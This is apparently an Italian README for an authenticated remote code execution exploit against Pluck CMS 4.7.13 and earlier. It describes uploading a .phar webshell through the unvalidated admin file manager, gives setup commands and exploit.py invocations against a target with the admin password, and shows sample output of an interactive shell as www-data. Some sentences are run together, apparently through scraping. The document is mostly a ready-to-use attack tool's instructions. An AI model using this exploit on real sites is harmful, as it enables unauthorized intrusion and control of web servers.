
Exploit RCE autenticato per Pluck CMS <= 4.7.13 tramite caricamento di file non validato. Carica una webshell PHP e fornisce una shell interattiva per i comandi.
Esecuzione remota di codice autenticata in Pluck CMS precedente alla versione 4.7.13. Il file manager dell'amministratore (
admin.php?action=files) non convalida le estensioni dei file, consentendo il caricamento di file.pharche Apache esegue come PHP. Il caricamento di una webshell tramite questo endpoint porta a RCE come utente del server web.
shell.phar tramite il file manager dell'amministratore.id.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
# Pluck nella root
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD
# Pluck in una sottodirectory
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck
Esempio:
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Accesso in corso...
[+] Accesso effettuato
[*] Caricamento webshell...
[+] Webshell caricata
[*] URL shell: http://10.10.10.10/files/shell.phar
[+] Il target è vulnerabile! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell aperta. Digita 'exit' o Ctrl+C per uscire.
Shell> whoami
www-data